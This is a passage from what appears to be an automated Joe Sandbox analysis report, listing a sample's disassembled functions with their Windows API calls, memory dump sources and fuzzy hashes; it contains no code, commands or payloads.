                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                                                                  • String ID: cdecl
                                                                                                                  • API String ID: 4031866154-3896280584
                                                                                                                  • Opcode ID: 7c12fbd8e9dfeed687bf7b588d62962939d06a32acc6cb64ad589a10f65e0f39
                                                                                                                  • Instruction ID: 3e65dd55820eccd385b591c520577f9acfc1150057d2323f4bbf4b25f54d9dc5
                                                                                                                  • Opcode Fuzzy Hash: 7c12fbd8e9dfeed687bf7b588d62962939d06a32acc6cb64ad589a10f65e0f39
                                                                                                                  • Instruction Fuzzy Hash: 6711B636200315AFDB25AF34EC45E7A77A8FF49354B80506AF906DB291EB71D950C7A0
                                                                                                                  Function 00E12F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 00E12FB5
                                                                                                                    • Part of subcall function 00E0395C: __FF_MSGBANNER.LIBCMT ref: 00E03973
                                                                                                                    • Part of subcall function 00E0395C: __NMSG_WRITE.LIBCMT ref: 00E0397A
                                                                                                                    • Part of subcall function 00E0395C: RtlAllocateHeap.NTDLL(01070000,00000000,00000001), ref: 00E0399F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 614378929-0
                                                                                                                  • Opcode ID: fb714c757364b7c2553544895f031bd25f807d71677c6d9ebf069ce7ae4c5953
                                                                                                                  • Instruction ID: 691df49031def0d9902e12efeae90e62ddc38c76dc486353319c8c912901823a
                                                                                                                  • Opcode Fuzzy Hash: fb714c757364b7c2553544895f031bd25f807d71677c6d9ebf069ce7ae4c5953
                                                                                                                  • Instruction Fuzzy Hash: 8C1150319082119FDB313F70AC446DE7BD4AF4C3A4F206819F949BA191CB30CCD08790
                                                                                                                  Function 00E2058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00E205AC
                                                                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00E205C7
                                                                                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00E205DD
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00E20632
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3137044355-0
                                                                                                                  • Opcode ID: 08c8cfdfb0c56beccb55dc4029c0e9f3df4d4bdf0ef181c00f48a9b88d11412b
                                                                                                                  • Instruction ID: 6773772e094ff07d73bb846b7b46a27daa25fca2b654334527e906107e68ae1b
                                                                                                                  • Opcode Fuzzy Hash: 08c8cfdfb0c56beccb55dc4029c0e9f3df4d4bdf0ef181c00f48a9b88d11412b
                                                                                                                  • Instruction Fuzzy Hash: 4521B471A40228EFDB20CF91FC88ADBBBB8EF40704F009469E516B2491DBB1EA54DF50
                                                                                                                  Function 00E26713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E26733
                                                                                                                  • _memset.LIBCMT ref: 00E26754
                                                                                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00E267A6
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00E267AF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1157408455-0
                                                                                                                  • Opcode ID: c136987f857a403ca2f3e8e41e84873808d8a4221b15eeea154900bcbf1324ad
                                                                                                                  • Instruction ID: 0abbbf535e20c5c3817c4797db6acb88c152a7ccc350cd00c528a6b880401f68
                                                                                                                  • Opcode Fuzzy Hash: c136987f857a403ca2f3e8e41e84873808d8a4221b15eeea154900bcbf1324ad
                                                                                                                  • Instruction Fuzzy Hash: F711A775D012287AE72057A5BC4DFABBABCEF44764F10429AF504F71D0D6744E848B74
                                                                                                                  Function 00E1B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E1AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E1AA79
                                                                                                                    • Part of subcall function 00E1AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E1AA83
                                                                                                                    • Part of subcall function 00E1AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E1AA92
                                                                                                                    • Part of subcall function 00E1AA62: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00E1AA99
                                                                                                                    • Part of subcall function 00E1AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E1AAAF
                                                                                                                  • GetLengthSid.ADVAPI32(?,00000000,00E1ADE4,?,?), ref: 00E1B21B
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E1B227
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E1B22E
                                                                                                                  • CopySid.ADVAPI32(?,00000000,?), ref: 00E1B247
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocateInformationProcessToken$CopyErrorLastLength
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 259861997-0
                                                                                                                  • Opcode ID: 0036b77722edee096e2a2e3225d02715c4d2470069bb2b329748fe962988d4ca
                                                                                                                  • Instruction ID: 45644ed756ed16f09c9d4c725e641414d298eaa441a0a961154bc3aef45fd21c
                                                                                                                  • Opcode Fuzzy Hash: 0036b77722edee096e2a2e3225d02715c4d2470069bb2b329748fe962988d4ca
                                                                                                                  • Instruction Fuzzy Hash: B61182B1A01205AFDB049F54DD85AEFB7A9EF85348F14902DE542E7221D771AE88CB10
                                                                                                                  Function 00E1B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00E1B498
                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E1B4AA
                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E1B4C0
                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E1B4DB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3850602802-0
                                                                                                                  • Opcode ID: fb59d5f7cc3acf159cd4c04b488a533aecb1777743a6936b9e5d8ab9b2710395
                                                                                                                  • Instruction ID: cb095a41eacd6e64190d669ee7c19ab8f1c332e8e8d1172045880a0da14e6c38
                                                                                                                  • Opcode Fuzzy Hash: fb59d5f7cc3acf159cd4c04b488a533aecb1777743a6936b9e5d8ab9b2710395
                                                                                                                  • Instruction Fuzzy Hash: D711487A900218FFDB11DFA9C881EDDBBB4FB08710F208091E614B7290D771AE50DB94
                                                                                                                  Function 00E2732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E27352
                                                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00E27385
                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E2739B
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E273A2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2880819207-0
                                                                                                                  • Opcode ID: 4ee9b7b3ad5f1a3fb5b397fe26b5b9aa3c2c1cabe03a5a0c3e34f5251cdf38c4
                                                                                                                  • Instruction ID: 487919b4f238d908b02b3efa17826a9382ae6f6d2ebb5c35b24d77938edb06b2
                                                                                                                  • Opcode Fuzzy Hash: 4ee9b7b3ad5f1a3fb5b397fe26b5b9aa3c2c1cabe03a5a0c3e34f5251cdf38c4
                                                                                                                  • Instruction Fuzzy Hash: 3D110476A08214AFC701DBA9EC09B9F7FED9B4A364F044315F921F32A1D6B09D1897B0
                                                                                                                  Function 00DFD17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DFD1BA
                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00DFD1CE
                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00DFD1D8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3970641297-0
                                                                                                                  • Opcode ID: 0c1b4ca9a7ae535e73b90919da8fc9271aab3e03fab30d38bb79f92272e61198
                                                                                                                  • Instruction ID: c8239e035c216bab7b986eac0b0efd13cf3c092462e04486db45f6aee501b87f
                                                                                                                  • Opcode Fuzzy Hash: 0c1b4ca9a7ae535e73b90919da8fc9271aab3e03fab30d38bb79f92272e61198
                                                                                                                  • Instruction Fuzzy Hash: 51118E7250160DBFEB014F919C54EEA7B6AFF093A4F054112FA0562150C771ED609BA0
                                                                                                                  Function 00E14DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3016257755-0
                                                                                                                  • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                  • Instruction ID: e875011185ed8d8470a6705e3ba0ad8528946104ed6583be36e1b6174def29d0
                                                                                                                  • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                  • Instruction Fuzzy Hash: 28014CB600014EFBCF125E84DC02CEE3F63BB18355B589555FE2969275D336CAB1AB81
                                                                                                                  Function 00E07452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E07A0D: __getptd_noexit.LIBCMT ref: 00E07A0E
                                                                                                                  • __lock.LIBCMT ref: 00E0748F
                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 00E074AC
                                                                                                                  • _free.LIBCMT ref: 00E074BF
                                                                                                                  • InterlockedIncrement.KERNEL32(01095720), ref: 00E074D7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2704283638-0
                                                                                                                  • Opcode ID: ea10c7d0dfafc2a824a5b90c9aeff3bbac936face3edeff9644df87b3f1eb5b7
                                                                                                                  • Instruction ID: 4062a076c393cb5e84f2d9057e31df420a3a8ad48382a449b57e18b52be557a5
                                                                                                                  • Opcode Fuzzy Hash: ea10c7d0dfafc2a824a5b90c9aeff3bbac936face3edeff9644df87b3f1eb5b7
                                                                                                                  • Instruction Fuzzy Hash: 1001D631E09611EBDB21AF65A80575DBBA0BF04B14F196016F4A4776C0C73079D0CFC2
                                                                                                                  Function 00E07A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __lock.LIBCMT ref: 00E07AD8
                                                                                                                    • Part of subcall function 00E07CF4: __mtinitlocknum.LIBCMT ref: 00E07D06
                                                                                                                    • Part of subcall function 00E07CF4: RtlEnterCriticalSection.NTDLL(00000000), ref: 00E07D1F
                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00E07AE5
                                                                                                                  • __lock.LIBCMT ref: 00E07AF9
                                                                                                                  • ___addlocaleref.LIBCMT ref: 00E07B17
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1687444384-0
                                                                                                                  • Opcode ID: 16791dc2c11a382aba76665b22f449d5408044b80bb264fbd91706a3eec22a82
                                                                                                                  • Instruction ID: 1ac933332c0d53ec9a84ef3622688d8943fe467294993be88c061d1d0988ba06
                                                                                                                  • Opcode Fuzzy Hash: 16791dc2c11a382aba76665b22f449d5408044b80bb264fbd91706a3eec22a82
                                                                                                                  • Instruction Fuzzy Hash: 96015B71944B009EE730AF75D90674AB7F0EF54325F20990EA4DAA62E0CBB0A684CF41
                                                                                                                  Function 00E4EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00DFAFE3
                                                                                                                    • Part of subcall function 00DFAF83: SelectObject.GDI32(?,00000000), ref: 00DFAFF2
                                                                                                                    • Part of subcall function 00DFAF83: BeginPath.GDI32(?), ref: 00DFB009
                                                                                                                    • Part of subcall function 00DFAF83: SelectObject.GDI32(?,00000000), ref: 00DFB033
                                                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E4EA8E
                                                                                                                  • LineTo.GDI32(00000000,?,?), ref: 00E4EA9B
                                                                                                                  • EndPath.GDI32(00000000), ref: 00E4EAAB
                                                                                                                  • StrokePath.GDI32(00000000), ref: 00E4EAB9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1539411459-0
                                                                                                                  • Opcode ID: 6bc18ad810dd7dec757f15edeea9b3b77b8023cd54810df937b7fe4f310eaaa6
                                                                                                                  • Instruction ID: 9545a80cce4dd589b5018311271089da092d2b7ba80f2b5186610762923ff37a
                                                                                                                  • Opcode Fuzzy Hash: 6bc18ad810dd7dec757f15edeea9b3b77b8023cd54810df937b7fe4f310eaaa6
                                                                                                                  • Instruction Fuzzy Hash: 74F0BE31509258BFDB129F95BC0AFCB3F1AAF0A350F084101FA11740E183B45519DBA5
                                                                                                                  Function 00E1C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E1C84A
                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E1C85D
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E1C864
                                                                                                                  • AttachThreadInput.USER32(00000000), ref: 00E1C86B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
